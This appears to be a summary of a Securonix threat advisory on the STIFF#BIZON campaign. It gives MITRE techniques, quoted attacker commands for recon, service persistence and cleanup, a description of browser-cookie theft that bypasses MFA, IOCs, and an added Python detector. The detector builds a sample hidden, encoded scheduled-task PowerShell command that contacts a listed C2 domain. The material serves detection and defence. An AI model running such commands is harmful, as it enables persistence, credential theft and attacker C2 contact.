Securonix Threat Labs Initial Coverage Advisory: STIFF#BIZON Detection Using Securonix – New Attack Campaign Observed Possibly Linked to Konni/APT37 (North Korea)

Keypoints

  • STIFF#BIZON is a Konni/APT37-aligned campaign observed targeting multiple countries, with indications of shared tradecraft and artifacts.
  • Initial access is via phishing documents containing a compressed archive with malicious files (missile.docx and _weapons.doc.lnk).
  • The loader uses Base64-encoded payloads and PowerShell stagers to download and execute additional components (weapons.doc and wp.vbs) and establish C2.
  • Stage 2 (wp.vbs) creates a new scheduled task (Office Update) to run a PowerShell script encoded in Base64, enabling C2 communications.
  • Stage 4 introduces multiple modules (capture.net.exe, chkey.net.exe, pull.net.exe, shell.net.exe) for credential access, browser data theft, and an interactive shell for command execution.
  • Indicators of compromise include specific IPs (e.g., 185.176.43.106) and domains (547857.c1.biz, 65487.c1.biz) plus a set of dynamic hashes for loaded components.
  • Attribution to APT37 remains uncertain; possible false-flag manipulation and correlations with FancyBear/APT28 are discussed.
  • Securonix provides mitigations, detections, and hunting queries focused on credential protection, restricted PowerShell/VBScript execution, and geo-blocking.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Infection starts through phishing emails with a malicious attachment. ‘The infection starts through phishing emails, which attempt to lure the victim to open a malicious attachment. In this particular case the threat actors attached a file containing the malware.’
  • [T1059.001] PowerShell – Base64 payload executed as a PowerShell stager initiating C2 and downloading/running files. ‘The Base64 payload is executed as another PowerShell stager which initiates C2 communication and downloads and runs both “weapons.doc” and “wp.vbs” files.’
  • [T1059.003] Windows Command Shell – Command-line activity observed during recon (e.g., ‘cmd /c tasklist’ and similar). ‘Initial recon begins: cmd /c cd /d “C:\Users” && dir /a/o-d/s *.*’
  • [T1053.005] Scheduled Task – wp.vbs creates a new scheduled task that runs a PowerShell script encoded in Base64. ‘The scheduled task executes a PowerShell script encoded in Base64.’
  • [T1569.002] Service Execution – Service-based persistence and execution (e.g., installation and manipulation of the wpcsvc service and its DLL). ‘Service installation for persistence’ and related registry/service commands (e.g., reg add … wpcsvc.dll).
  • [T1134.001] Token Impersonation/Theft – Decrypting the browser's DPAPI-protected state key so that stored cookies can be reused to bypass MFA. ‘This state key is encrypted using DPAPI… decrypt the cookie database offline and use this to import cookies into a machine controlled by the TA and access any available services without MFA authentication.’
  • [T1548.002] Bypass User Account Control – Anti-debugging and privilege escalation via rundll32 usage and WaitForDebugEvent tricks. ‘anti-debugging techniques with API WaitForDebugEvent and ContinueDebugEvent to execute passed cmdline.’
  • [T1027.005] Indicator Removal from Tools – Deleting traces (e.g., ‘del /f /q’ of artifacts). ‘del /f /q “C:\Windows\system32\wpcsvc.*”’ (examples of cleanup steps).
  • [T1606.001] Web Cookies – Harvesting browser credentials to access services without MFA. ‘State key … encrypted using DPAPI… decrypt the cookie database offline and use cookies to access services without MFA authentication.’
  • [T1082] System Information Discovery – Gathering host information during recon (e.g., ‘systeminfo’, ‘dir’, ‘tasklist’). ‘cmd /c systeminfo’ and similar commands.
  • [T1113] Screen Capture – Capturing screenshots and exfiltrating results. ‘Capture.net.exe … to create a screenshot using Win32 GDI API and upload the gzipped results to the C2 server.’
  • [T1119] Automated Collection – Automated data gathering from the infected host (e.g., browser data, credentials).
  • [T1071.001] Web Protocols – Command and control over HTTP(S) endpoints (view.php, info.php, dn.php). ‘Download lure document: weapons.doc: /view.php?…’ and similar C2 communications.
  • [T1105] Ingress Tool Transfer – Transferring tools/TA files to the victim host. ‘Transfer tools/TA files to victim host:’
  • [T1041] Exfiltration Over C2 Channel – Data exfiltration conducted via the C2 channel. The source references ‘Automated Exfiltrated’ and ‘Exfiltration Over C2 Channel’.
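As an added example that is not from the advisory or from Securonix's own detection content, the following Python detector applies the techniques listed above to constructed process-creation events: it decodes PowerShell -EncodedCommand arguments (Base64 of UTF-16LE text), and flags scheduled-task creation that runs encoded PowerShell, wscript.exe spawning PowerShell (the wp.vbs stage), the recon directory walk, and any reference to the campaign's listed C2 domains. The event fields, sample command lines and rule names are assumptions.

```python
import base64
import re

# Constructed sample process-creation events (not telemetry from the advisory); the
# encoded command is built from a harmless Invoke-WebRequest line (PowerShell -EncodedCommand is UTF-16LE).
ENCODED = base64.b64encode(
    "Invoke-WebRequest -Uri http://547857.c1.biz/info.php -UseBasicParsing".encode("utf-16-le")
).decode()

SAMPLE_EVENTS = [
    {"parent": "wscript.exe",
     "cmdline": f'schtasks /create /tn "Office Update" /tr "powershell -w hidden -enc {ENCODED}" /sc minute /mo 30'},
    {"parent": "cmd.exe", "cmdline": 'cmd /c cd /d "C:\\Users" && dir /a/o-d/s *.*'},
    {"parent": "explorer.exe", "cmdline": "powershell -NoProfile -File C:\\scripts\\backup.ps1"},
]

C2_DOMAINS = {"547857.c1.biz", "65487.c1.biz"}  # domains named in the advisory
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """Return the list of STIFF#BIZON-style rules (assumed names) that fire on one event."""
    hits = []
    low = event["cmdline"].lower()
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        hits.append("encoded_powershell")
        if any(d in decoded.lower() for d in C2_DOMAINS):
            hits.append("known_c2_domain")
        if "schtasks" in low and "/create" in low:
            hits.append("scheduled_task_runs_encoded_ps")
    if event["parent"].lower() == "wscript.exe" and "powershell" in low:
        hits.append("vbscript_spawns_powershell")
    if 'cd /d "c:\\users"' in low and "dir /a/o-d/s" in low:
        hits.append("recon_user_dir_walk")
    return hits

def scan(events):
    """Return (index, rule names) for every event that triggered at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```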

Indicators of Compromise

  • [IP] 185.176.43.106 – Host communication / C2 activity
  • [Domain] 547857.c1.biz – C2/recon domain
  • [Domain] 65487.c1.biz – C2/recon domain

Read more: https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/